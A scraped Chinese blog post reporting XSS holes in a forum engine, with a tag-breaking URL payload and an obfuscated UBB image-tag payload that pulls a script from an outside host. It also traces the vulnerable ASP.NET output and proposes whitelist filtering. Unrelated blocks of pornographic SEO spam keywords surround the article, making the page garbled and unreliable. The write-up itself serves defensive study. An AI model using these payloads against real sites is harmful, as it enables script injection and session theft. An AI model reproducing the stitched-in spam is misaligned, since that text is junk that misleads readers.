<output id="qn6qe"></output>


      2. 

      <output id="qn6qe"><tt id="qn6qe"></tt></output>
      3. <strike id="qn6qe"></strike>
      
亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12 
    
        
      
                
                    
                    
                
        
      
    
      
        
    
      

    

    

      
    代碼改變世界
    

    

    

    

    
      
        
      
            
            
      

      
    
    
      
    XSS跨站腳本實(shí)例
    



      
    
2011-11-13 11:35 
熬夜的蟲子 
閱讀(2023) 
評(píng)論(0) 
 
收藏 
舉報(bào)

    
      
        
      

      剛畢業(yè)時(shí)候的做的報(bào)告,整理文檔的時(shí)候搜了出來,可能不是很正確僅供參考了
      

      

       URL注入  
      

      例如在頁(yè)面上輸入
      

      http://localhost/SNDA.BBSEngine.UI.ALWeb/TopicContent.aspx?BoardID=59&TopicID=6890&Page=1-->'");></SCRIPT></style></title></textarea><SCRIPT>alert("haha")</SCRIPT>
      

       
      

      查看源文件里的會(huì)有這樣的代碼
      

      <A class=maintitle                                                         
      

      href="http://localhost/SNDA.BBSEngine.UI.ALWeb/TopicContent.aspx?BoardID=59&TopicID=6890&Page=1-->'");></SCRIPT></style></title></textarea><SCRIPT>alert("haha")</SCRIPT>"><FONT size="4">
      前面藍(lán)色的部分被截?cái)嗔恕?/span>
      

      部分頁(yè)面源代碼是這樣的
      

      <A class=maintitle href="<%=this.CurrentUrl%>"><FONT size="4">    
      

       
      

      其他頁(yè)面也有類似的代碼而且被注入的地方也是這些地方例如
      

      是這段代碼<FORM id="Frm" name="Frm" action='UserLogin.aspx?ru=<%=Request.RawUrl%>' method="post" onsubmit="javascript:return CheckForm();">
      

      一些頁(yè)面是
      

      <a href="<%=Request.RawUrl%>" class="gensmall">會(huì)員列表</a>   
      

       
      

      所以考慮到這些可以采取安全部的意見使用白名單過濾:
      

      先對(duì)URL的內(nèi)容進(jìn)行解碼這樣可以轉(zhuǎn)義相當(dāng)一部分玩家的花招
      string strXss= Server.UrlDecode(this.Request.RawUrl.ToString());   
      然后使用白名單過濾:
      只保留/HTTP://&?=%.,數(shù)字,字母,漢字,下劃線。
      

       
      

      

       XSS表單注入
      

       
      

       UBB解析前(僅討論針對(duì)IMG標(biāo)簽)
      

         注入字符串:
      "\r\n[img]http://[color=a\t\twidth=00\t\tSTYLE=a:expr/&#92;/Ession(docum&#00;ent.write(\"&#60;scr&#00;ipt/&#92;/src=http://sd0o.com.cn/1000y.jpg&#62;&#60;/scr&#00;ipt&#62;\"))\t=]\t[/color][/img]\r\n
      

       
      

      UBB解析過程:
      

      解析前字符串:
      

      "<br>[img]http://[color=a\t\twidth=00\t\tSTYLE=a:expr/\\/Ession(docum\0ent.write(&quot;&lt;scr\0ipt/\\/src=http://sd0o.com.cn/1000y.jpg&gt;&lt;/scr\0ipt&gt;&quot;))\t=]\t[/color][/img]<br>"
      

      正則表達(dá)式:
      

      @"\[img\](?<img>.+?)\[\/img\]"
      

      要替換的字符串:
      

      "<a href='${img}' target='_blank'><img src='${img}' border=0 onmousewheel='javascript:return bbimg(this)' onload=\"javascript:setTimeout('if(this.width>790)this.style.width=790',1000);\" alt='Ctrl + 滾輪可以縮放圖片大小'></a>"
               替換后表達(dá)式
      "<br><a href='http://[color=a\t\twidth=00\t\tSTYLE=a:expr/**/Ession(docum\0ent.write(&quot;&lt;scr\0ipt/**/src=http://sd0o.com.cn/1000y.jpg&gt;&lt;/scr\0ipt&gt;&quot;))\t=]\t[/color]' target='_blank'><img src='http://[color=a\t\twidth=00\t\tSTYLE=a:expr/**/Ession(docum\0ent.write(&quot;&lt;scr\0ipt/**/src=http://sd0o.com.cn/1000y.jpg&gt;&lt;/scr\0ipt&gt;&quot;))\t=]\t[/color]' border=0 onmousewheel='javascript:return bbimg(this)' onload=\"javascript:setTimeout('if(this.width>790)this.style.width=790',1000);\" alt='Ctrl + 滾輪可以縮放圖片大小'></a><br>"
      


      


      

       
      

      


      

        
      
        
      
        
      
        
      
        
      
        
      
    
      

      
    
        
        
    
      

      





      

      
    
    
      
    
    
      
    
      
        
      
    
      
        
    
      
    
    
      
    
      
    

      


      


        
      

        

        

        

        
    
      

    


      




    

    
    





主站蜘蛛池模板:
国产亚洲精品黑人粗大精选|
18禁黄网站免费|
国产精品第一页中文字幕
|
亚洲精品国模一区二区|
日韩成人无码影院|
精品亚洲国产成人性色av|
福利在线视频一区二区|
成人免费xxxxx在线观看|
亚洲少妇人妻无码视频|
精品久久久久久中文字幕202|
大地资源高清播放在线观看|
麻豆精品一区二区综合av|
蜜桃伦理一区二区三区|
天天弄天天模|
99久久免费精品国产色|
性一交一乱一伦|
国内自拍偷拍一区二区三区|
欧美日韩视频综合一区无弹窗|
精品国产午夜福利在线观看
|
热久久美女精品天天吊色|
欧美老少配性行为|
亚洲av综合色区无码专区|
国产成人精品区一区二区|
免费99精品国产人妻自在现线|
国产精品久久精品国产|
久久精品国产99亚洲精品|
2020年最新国产精品正在播放
|
国产精品国语对白一区二区|
午夜精品极品粉嫩国产尤物|
国产精品亚洲а∨天堂2021|
色色97|
亚洲av中文久久精品国内|
人人爽人人爽人人片av东京热
|
在线高清免费不卡全码|
黑龙江省|
综合图区亚洲另类偷窥|
五月天天天综合精品无码|
韩国精品福利视频一区二区|
中文人妻AV高清一区二区|
国产精品疯狂输出jk草莓视频|
亚洲精品成人一二三专区|